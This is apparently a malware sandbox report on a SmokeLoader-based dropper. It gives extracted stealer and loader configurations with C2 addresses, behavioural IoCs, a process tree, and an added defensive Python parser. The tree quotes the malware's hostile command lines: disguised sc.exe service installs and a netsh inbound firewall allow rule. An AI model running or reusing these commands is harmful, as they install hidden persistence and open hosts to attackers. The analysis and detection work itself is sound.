Analysis
max time kernel: 18002s
max time network: 17997s
platform: windows7_x64
resource: win7-en-20210920
submitted: 03-11-2021 17:22

Static task: static1
Behavioral task: behavioral1
  Sample: 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
  Resource: win7-en-20210920
Behavioral task: behavioral2
  Sample: 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
  Resource: win10-en-20211014
General
Target: 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
Size: 292KB
MD5: d2fff856a1371f8b3602a2247ab26d46
SHA1: c2acff6cdf47ee82fe35637780e163e46ab5c4d7
SHA256: 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531
SHA512: 6579f2e625ca19be10fcea9f68427c9887f21af26752d775b2987dace469759a8588b56a08a533fc4ba5055df4918c87ee1539146e58dc20c5c7280bef6d1d92
Malware Config
Extracted: smokeloader 2020
Extracted: tofsee
  quadoil.ru
  lakeflex.ru
Extracted: redline
  SuperStar
  185.215.113.29:36224
Extracted: icedid
  3022016856
  actuallyobligat.info
Extracted: redline
  LOVE
  91.242.229.222:21475
Extracted: redline
  101
  185.92.73.142:52097
Extracted: redline
  z0rm1on
  45.153.186.153:56675
Extracted: vidar
  47.8
  706
  https://mas.to/@romashkin
  profile_id: 706
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 8 IoCs
Processes:
resource  yara_rule
behavioral1/memory/720-106-0x0000000000800000-0x000000000081C000-memory.dmp  family_redline
behavioral1/memory/720-114-0x0000000001ED0000-0x0000000001EEB000-memory.dmp  family_redline
behavioral1/memory/1212-133-0x00000000023B0000-0x00000000023EE000-memory.dmp  family_redline
behavioral1/memory/1212-134-0x0000000002550000-0x000000000258D000-memory.dmp  family_redline
behavioral1/memory/1232-143-0x0000000002120000-0x0000000002150000-memory.dmp  family_redline
behavioral1/memory/1232-144-0x00000000007F0000-0x000000000080B000-memory.dmp  family_redline
behavioral1/memory/1708-229-0x0000000001DE0000-0x0000000001E0E000-memory.dmp  family_redline
behavioral1/memory/1708-231-0x0000000001E10000-0x0000000001E3C000-memory.dmp  family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

Arkei Stealer Payload 2 IoCs
Processes:
resource  yara_rule
behavioral1/memory/1180-147-0x0000000000220000-0x0000000000241000-memory.dmp  family_arkei
behavioral1/memory/1180-148-0x0000000000400000-0x00000000008F0000-memory.dmp  family_arkei

Core1 .NET packer 1 IoCs
Detects packer/loader used by .NET malware.
Processes:
resource  yara_rule
behavioral1/memory/1232-143-0x0000000002120000-0x0000000002150000-memory.dmp  Core1

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs

Vidar Stealer 2 IoCs
Processes:
resource  yara_rule
behavioral1/memory/1308-250-0x0000000000960000-0x0000000000A36000-memory.dmp  family_vidar
behavioral1/memory/1308-251-0x0000000000400000-0x0000000000959000-memory.dmp  family_vidar

Blocklisted process makes network request 2 IoCs
Processes:
flow  pid   process
126   1488  powershell.exe
133   1488  powershell.exe

Creates new service(s) 1 TTPs

Downloads MZ/PE file

Executes dropped EXE 64 IoCs

Modifies Windows Firewall 1 TTPs

Checks BIOS information in registry 2 TTPs 64 IoCs
BIOS information is often read in order to detect sandboxing environments.

Deletes itself 1 IoCs
Processes:
pid   process
1264

Loads dropped DLL 57 IoCs

Modifies file permissions 1 TTPs 3 IoCs
Processes:
pid   process
1640  icacls.exe
1468  icacls.exe
1740  icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Suspicious use of SetThreadContext 34 IoCs
autoit_exe 21 IoCs
AutoIT scripts compiled to PE executables.

Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash 1 IoCs
Processes:
pid  pid_target  process       target process
324  1308        WerFault.exe  366.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Processes: 630.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 630.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 630.exe
-
Delays execution with timeout.exe 1 IoCs
Processes:
Processes: timeout.exe
pid | process
856 | timeout.exe
-
Kills process with taskkill 2 IoCs
Processes:
Processes: taskkill.exe
pid | process
988 | taskkill.exe
1900 | taskkill.exe
-
Processes: mshta.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
-
Modifies data under HKEY_USERS 20 IoCs
The MuiCache strings written by netsh.exe are the display names of the Network Access Protection enforcement-client DLLs (dhcpqec, napipsec, tsgqec, eapqec) that netsh loads when it runs, and the ZoneMap values written by zfadmvvq.exe are the defaults WinINet creates on first use; both land under \REGISTRY\USER\.DEFAULT because the writers run under the service account, so they are side effects of the firewall and service commands rather than configuration the malware sets.
Processes: netsh.exe, zfadmvvq.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" | netsh.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | zfadmvvq.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | zfadmvvq.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" | netsh.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | zfadmvvq.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" | netsh.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" | netsh.exe
-
The certificate written here is the public Starfield Class 2 Certification Authority root (its name is readable in the blob, and AD7E1C28... is that root's SHA-1 thumbprint). AuthRoot\Certificates is the store that Windows' automatic root update fills when a process first validates a chain ending in a root not yet cached locally, so this entry is a side effect of 366.exe making a TLS connection, not an attacker-installed root; a malicious root would normally be written to the ROOT store instead.
Processes: 366.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A | 366.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 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 | 366.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 | 366.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
pid | process
1112 | 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
1112 | 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
1264 | (image name not recorded; 62 entries)
PID 1264 has no image name anywhere in this report. It is the process that goes on to spawn the dropped payloads (CF8F.exe, D48F.exe, DE12.exe, E18C.exe and E812.exe in the WriteProcessMemory table), holds SeShutdownPrivilege and calls FindShellTrayWindow and SendNotifyMessage; that profile is consistent with explorer.exe, the process SmokeLoader normally injects into, although the report itself does not name it.
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes: WerFault.exe, B163.exe
pid | process
1264 | (image name not recorded)
324 | WerFault.exe
1696 | B163.exe
-
Suspicious behavior: MapViewOfSection 63 IoCs
Processes: 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe, CF8F.exe, DE12.exe, iuehjsa, jjehjsa
pid | process
1112 | 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
1056 | CF8F.exe
1344 | DE12.exe
1944 | iuehjsa
1936 | jjehjsa
572 | iuehjsa
1216 | jjehjsa
1952 | iuehjsa
1128 | jjehjsa
320 | iuehjsa
1064 | jjehjsa
1600 | iuehjsa
1988 | jjehjsa
1384 | iuehjsa
276 | jjehjsa
1312 | iuehjsa
188 | jjehjsa
1640 | iuehjsa
456 | jjehjsa
2408 | iuehjsa
2384 | jjehjsa
968 | iuehjsa
2040 | jjehjsa
2672 | iuehjsa
2704 | jjehjsa
2160 | iuehjsa
2296 | jjehjsa
2948 | iuehjsa
2664 | jjehjsa
2564 | jjehjsa
2576 | iuehjsa
1480 | iuehjsa
2204 | jjehjsa
2696 | iuehjsa
2896 | jjehjsa
2364 | iuehjsa
2580 | jjehjsa
3020 | iuehjsa
1200 | jjehjsa
2648 | iuehjsa
1540 | jjehjsa
2288 | iuehjsa
2680 | jjehjsa
2592 | iuehjsa
1732 | jjehjsa
3004 | iuehjsa
2728 | jjehjsa
2780 | iuehjsa
2412 | jjehjsa
2476 | iuehjsa
2796 | jjehjsa
2212 | iuehjsa
2532 | jjehjsa
956 | iuehjsa
1568 | jjehjsa
2140 | iuehjsa
3008 | jjehjsa
2300 | iuehjsa
2180 | jjehjsa
2932 | iuehjsa
1080 | jjehjsa
3048 | iuehjsa
1568 | jjehjsa
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: FAC9.exe, 101.exe, E812.exe, taskkill.exe, FABE.exe, WerFault.exe, powershell.exe, D5E5.exe
description | pid | process
Token: SeDebugPrivilege | 1212 | FAC9.exe
Token: SeDebugPrivilege | 1232 | 101.exe
Token: SeDebugPrivilege | 720 | E812.exe
Token: SeDebugPrivilege | 988 | taskkill.exe
Token: SeShutdownPrivilege | 1264 | (image name not recorded; 2 entries)
Token: SeDebugPrivilege | 1708 | FABE.exe
Token: SeDebugPrivilege | 324 | WerFault.exe
Token: SeShutdownPrivilege | 1264 | (image name not recorded; 7 entries)
Token: SeDebugPrivilege | 1488 | powershell.exe
Token: SeShutdownPrivilege | 1264 | (image name not recorded; 11 entries)
Token: SeDebugPrivilege | 1900 | D5E5.exe
Token: SeShutdownPrivilege | 1264 | (image name not recorded; 2 entries)
Token: SeDebugPrivilege | 1900 | taskkill.exe
Token: SeShutdownPrivilege | 1264 | (image name not recorded; 33 entries)
-
Suspicious use of FindShellTrayWindow 22 IoCs
Processes: (image name not recorded)
pid | process
1264 | (image name not recorded; 22 entries)
-
Suspicious use of SendNotifyMessage 15 IoCs
Processes: (image name not recorded)
pid | process
1264 | (image name not recorded; 15 entries)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe, CF8F.exe, D48F.exe, E812.exe
description | pid | process | target process
PID 612 wrote to memory of 1112 | 612 | 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe | 1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe (7 entries)
PID 1264 wrote to memory of 812 | 1264 | (image name not recorded) | CF8F.exe (4 entries)
PID 1264 wrote to memory of 1164 | 1264 | (image name not recorded) | D48F.exe (4 entries)
PID 812 wrote to memory of 1056 | 812 | CF8F.exe | CF8F.exe (7 entries)
PID 1264 wrote to memory of 1344 | 1264 | (image name not recorded) | DE12.exe (4 entries)
PID 1164 wrote to memory of 824 | 1164 | D48F.exe | cmd.exe (4 entries)
PID 1264 wrote to memory of 1628 | 1264 | (image name not recorded) | E18C.exe (4 entries)
PID 1164 wrote to memory of 1824 | 1164 | D48F.exe | cmd.exe (4 entries)
PID 1164 wrote to memory of 1744 | 1164 | D48F.exe | sc.exe (4 entries)
PID 1264 wrote to memory of 1968 | 1264 | (image name not recorded) | E812.exe (4 entries)
PID 1164 wrote to memory of 1208 | 1164 | D48F.exe | sc.exe (4 entries)
PID 1164 wrote to memory of 1536 | 1164 | D48F.exe | sc.exe (4 entries)
PID 1164 wrote to memory of 2036 | 1164 | D48F.exe | netsh.exe (4 entries)
PID 1968 wrote to memory of 720 | 1968 | E812.exe | E812.exe (6 entries)
The writes from a process into a freshly started second copy of its own image (612 into 1112, 812 into 1056, 1968 into 720), together with the SetThreadContext flag the process tree shows on those same parents, are the write-then-resume sequence of process hollowing; the child copy is the one that then shows the SCSI checks, MapViewOfSection and SeDebugPrivilege behaviour.
Processes (depth in brackets; children are indented under their parent)

[1] C:\Users\Admin\AppData\Local\Temp\1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe"
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    [2] C:\Users\Admin\AppData\Local\Temp\1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\1bde288a4588a0f416222a80ba516d5b35ca3774d86c2c18aa2b9fa5b25d9531.exe"
        - Checks SCSI registry key(s)
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection

[1] C:\Users\Admin\AppData\Local\Temp\CF8F.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\CF8F.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    [2] C:\Users\Admin\AppData\Local\Temp\CF8F.exe
        cmdline: C:\Users\Admin\AppData\Local\Temp\CF8F.exe
        - Executes dropped EXE
        - Checks SCSI registry key(s)
        - Suspicious behavior: MapViewOfSection

[1] C:\Users\Admin\AppData\Local\Temp\D48F.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\D48F.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gipbfwre\
    [2] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zfadmvvq.exe" C:\Windows\SysWOW64\gipbfwre\
    [2] C:\Windows\SysWOW64\sc.exe
        cmdline: "C:\Windows\System32\sc.exe" create gipbfwre binPath= "C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe /d\"C:\Users\Admin\AppData\Local\Temp\D48F.exe\"" type= own start= auto DisplayName= "wifi support"
    [2] C:\Windows\SysWOW64\sc.exe
        cmdline: "C:\Windows\System32\sc.exe" description gipbfwre "wifi internet conection"
    [2] C:\Windows\SysWOW64\sc.exe
        cmdline: "C:\Windows\System32\sc.exe" start gipbfwre
    [2] C:\Windows\SysWOW64\netsh.exe
        cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

[1] C:\Users\Admin\AppData\Local\Temp\DE12.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\DE12.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection

[1] C:\Users\Admin\AppData\Local\Temp\E18C.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\E18C.exe
    - Executes dropped EXE

[1] C:\Users\Admin\AppData\Local\Temp\E812.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\E812.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    [2] C:\Users\Admin\AppData\Local\Temp\E812.exe
        cmdline: C:\Users\Admin\AppData\Local\Temp\E812.exe
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe
    cmdline: C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe /d"C:\Users\Admin\AppData\Local\Temp\D48F.exe"
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    [2] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jfefuofz\
    [2] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Windows\TEMP\gyqxwnyf.exe" C:\Windows\SysWOW64\jfefuofz\
    [2] C:\Windows\SysWOW64\sc.exe
        cmdline: "C:\Windows\System32\sc.exe" create jfefuofz binPath= "C:\Windows\SysWOW64\jfefuofz\gyqxwnyf.exe /d\"C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe\"" type= own start= auto DisplayName= "wifi support"
    [2] C:\Windows\SysWOW64\sc.exe
        cmdline: "C:\Windows\System32\sc.exe" description jfefuofz "wifi internet conection"
    [2] C:\Windows\SysWOW64\sc.exe
        cmdline: "C:\Windows\System32\sc.exe" start jfefuofz
    [2] C:\Windows\SysWOW64\netsh.exe
        cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
        - Modifies data under HKEY_USERS
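The two service installations above follow one template: create an eight-letter directory under SysWOW64, move a renamed copy into it, register that copy with sc.exe as an auto-start service whose binPath carries the installer's own path in a /d argument, start it, and add an inbound allow rule for svchost.exe. The second round is run by the first service itself, so the chain is D48F.exe installs gipbfwre (zfadmvvq.exe), and zfadmvvq.exe installs jfefuofz (gyqxwnyf.exe), staging the second copy from C:\Windows\TEMP because it now runs under the service account. The Python below is an added example, not code from the report or the sandbox: it parses those command lines (copied from the tree) and reconstructs the chain. The eight-letter naming heuristic, the flag wording and the assumption that a /d path naming another service's binary means that binary installed it are the example's own.

```python
"""Reconstruct the sc.exe/netsh.exe persistence chain from a process tree.

Added example, not part of the sandbox report. The command lines are copied from
the report's process tree; the regexes, the eight-letter naming heuristic and the
chain-linking rule are this example's own assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Copied from the report: D48F.exe's children, then the zfadmvvq.exe service's children.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\gipbfwre' + '\\',
    r'"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zfadmvvq.exe" C:\Windows\SysWOW64\gipbfwre' + '\\',
    r'"C:\Windows\System32\sc.exe" create gipbfwre binPath= "C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe /d\"C:\Users\Admin\AppData\Local\Temp\D48F.exe\"" type= own start= auto DisplayName= "wifi support"',
    r'"C:\Windows\System32\sc.exe" description gipbfwre "wifi internet conection"',
    r'"C:\Windows\System32\sc.exe" start gipbfwre',
    r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul',
    r'"C:\Windows\System32\sc.exe" create jfefuofz binPath= "C:\Windows\SysWOW64\jfefuofz\gyqxwnyf.exe /d\"C:\Windows\SysWOW64\gipbfwre\zfadmvvq.exe\"" type= own start= auto DisplayName= "wifi support"',
    r'"C:\Windows\System32\sc.exe" start jfefuofz',
]


@dataclass
class Service:
    name: str
    image: str                 # executable registered as the service binary
    installer: Optional[str]   # path handed over via /d"...": the binary that installed it
    start: str
    display_name: str
    flags: List[str] = field(default_factory=list)


SC_CREATE = re.compile(
    r'sc\.exe"?\s+create\s+(?P<name>\S+)\s+binPath=\s*"(?P<binpath>.*?)"\s+'
    r'type=\s*(?P<type>\S+)\s+start=\s*(?P<start>\S+)'
    r'(?:\s+DisplayName=\s*"(?P<display>[^"]*)")?', re.I)
INSTALLER_ARG = re.compile(r'/d\\"(?P<path>.*?)\\"')   # the escaped /d\"...\" inside binPath
NETSH_RULE = re.compile(
    r'netsh\.exe"?\s+advfirewall\s+firewall\s+add\s+rule\s+name="(?P<name>[^"]*)"\s+'
    r'dir=(?P<dir>\w+)\s+action=(?P<action>\w+)\s+program="(?P<program>[^"]*)"', re.I)
# Heuristic (our assumption): this dropper names both the directory and the binary
# with eight random lowercase letters directly under SysWOW64.
RANDOM_SYSDIR = re.compile(r'^[A-Z]:\\Windows\\SysWOW64\\[a-z]{8}\\[a-z]{8}\.exe$', re.I)


def parse_service(cmdline: str) -> Optional[Service]:
    """Return a Service for an `sc create` command line, None for anything else."""
    m = SC_CREATE.search(cmdline)
    if not m:
        return None
    binpath = m.group('binpath')
    image = binpath.split(' ', 1)[0]          # binPath = "<image> /d\"<installer>\""
    inst = INSTALLER_ARG.search(binpath)
    svc = Service(m.group('name'), image, inst.group('path') if inst else None,
                  m.group('start').lower(), m.group('display') or '')
    if RANDOM_SYSDIR.match(image):
        svc.flags.append('binary in random eight-letter SysWOW64 subdirectory')
    if svc.start == 'auto':
        svc.flags.append('auto-start service')
    if svc.display_name and svc.display_name.lower() not in image.lower():
        svc.flags.append('display name unrelated to binary name')
    return svc


def parse_firewall_rule(cmdline: str) -> Optional[Dict[str, object]]:
    """Return the fields of a `netsh advfirewall firewall add rule` command line."""
    m = NETSH_RULE.search(cmdline)
    if not m:
        return None
    rule: Dict[str, object] = m.groupdict()
    flags: List[str] = []
    if (m.group('dir').lower() == 'in' and m.group('action').lower() == 'allow'
            and m.group('program').lower().endswith('\\svchost.exe')):
        flags.append('inbound allow for svchost.exe: exempts every listener hosted by a service')
    rule['flags'] = flags
    return rule


def analyse(cmdlines: List[str]) -> Dict[str, object]:
    """Collect services and firewall rules, then link each service to its installing service."""
    services: List[Service] = []
    rules: List[Dict[str, object]] = []
    for line in cmdlines:
        svc = parse_service(line)
        if svc:
            services.append(svc)
            continue
        rule = parse_firewall_rule(line)
        if rule:
            rules.append(rule)
    # If a service's /d path is another service's binary, that other service installed it.
    by_image = {s.image.lower(): s.name for s in services}
    installed_by = {s.name: by_image.get((s.installer or '').lower()) for s in services}
    return {'services': services, 'rules': rules, 'installed_by': installed_by}


if __name__ == '__main__':
    result = analyse(SAMPLE_CMDLINES)
    for s in result['services']:
        print(f"{s.name}: {s.image} (installed by {result['installed_by'][s.name] or s.installer}) {s.flags}")
    for r in result['rules']:
        print(f"firewall rule {r['name']!r}: {r['dir']}/{r['action']} {r['program']} {r['flags']}")
```

On a live host the same fields come from the service registry keys (ImagePath under HKLM\SYSTEM\CurrentControlSet\Services\<name>) and from `netsh advfirewall firewall show rule name=all`; the chain-linking step is what distinguishes this two-stage installer from a single rogue service.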
[1] C:\Windows\system32\regsvr32.exe
